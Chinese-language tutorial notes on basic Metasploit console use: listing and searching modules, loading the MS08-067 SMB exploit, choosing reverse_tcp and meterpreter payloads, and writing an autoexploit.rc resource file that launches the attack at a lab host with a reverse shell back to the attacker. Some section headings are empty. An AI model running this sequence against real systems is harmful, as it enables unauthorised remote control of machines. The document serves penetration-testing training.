一、渗透攻击基础
Metasploit框架中包含数百个模块,在MSF终端中运行show命令会将所有的模块显示出来。
1、msf>show exploits
显示Metasploit框架中所有可用的渗透攻击模块。
Metasploit团队不断开发新的渗透攻击模块,不断更新
2、msf>show auxiliary
显示所有的辅助模块以及它们的用途。
3、msf>show options
当选择一个模块后输入,会列出所有这个模块所需的参数。
没有选择任何模块,则会显示所有的全局参数。
输入back命令,返回到Metasploit的上一个状态。
msf>use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)>back
msf>
想要查看某个特定的渗透攻击、辅助或攻击载荷模块时,使用search命令。
发起一次针对SQL数据库的攻击。
msf>search mssql
寻找和ms08_067_netapi漏洞相关的模块。
msf>search ms08_067_netapi
找到攻击模块后,使用use命令加载。
msf>use windows/smb/ms08_067_netapi
Notice:无论在哪个模块运行,都可以使用search和use跳转到另一个模块。
4、msf>show payloads
当在当前模块下输入,Metasploit只会将与当前模块兼容的攻击载荷显示出来。
未选择模块,命令显示所有处于活动状态的攻击载荷。
Metasploit会根据环境识别出可在一次特定的渗透攻击中使用的攻击载荷。
msf exploit(ms08_067_netapi)>show payloads
设置要使用的payload
msf exploit(ms08_067_netapi)>set payload windows/shell/reverse_tcp
msf exploit(ms08_067_netapi)>show options
Payload options显示了攻击载荷详细信息。
5、msf>show targets
Metasploit的渗透攻击模块能够列出受到漏洞影响目标系统的类型(包括补丁级别、语言版本、安全机制等)
msf exploit(ms08_067_netapi)>show targets
ID 0–自动选择目标,攻击目标列表中的一个选项。
6、setg和unsetg
对全局参数进行设置或清除。
7、save
setg读对全局参数进行设置后,使用save进行保存。
msf exploit(ms08_067_netapi)>setg RHOST 192.168.1.0
msf exploit(ms08_067_netapi)>save
二、第一次渗透攻击
三、Ubuntu渗透攻击
四、全端口攻击载荷
五、资源文件
MSF终端内包含一系列自动化命令的脚本文件。实际是可以在MSF终端执行的命令列表,列表中的命令按顺序执行。
resource命令载入资源文件,或在OS命令行环境使用-r标志资源文件作为MSF终端的一个参数进行传递。
创建显示Metasploit版本,载入声音的资源文件:
root@bt:/opt/framework3/msf3/ echo version>resource.rc
root@bt:/opt/framework3/msf3/ echo load sounds>>resource.rc
root@bt:/opt/framework3/msf3/ msfconsole -r resource.rc
version和load命令被写入资源文件,-r将资源文件载入。
结果:
自动化对某个主机发起攻击的资源文件,autoexploit.rc。
root@bt:/opt/framework3/msf3/ echo use windows/smb/ms08_067_netapi>autoexploit.rc
root@bt:/opt/framework3/msf3/echo set RHOST 192.168.1.155 >>autoexploit.rc
root@bt:/opt/framework3/msf3/echo set PAYLOAD windows/meterpreter/reverse_tcp >>autoexploit.rc
root@bt:/opt/framework3/msf3/echo set LHOST 102.168.1.101>>autoexploit.rc
root@bt:/opt/framework3/msf3/echo exploit>>autoexploit.rc
root@bt:/opt/framework3/msf3/msfconsole
msf>resource autoexploit.rc
结果: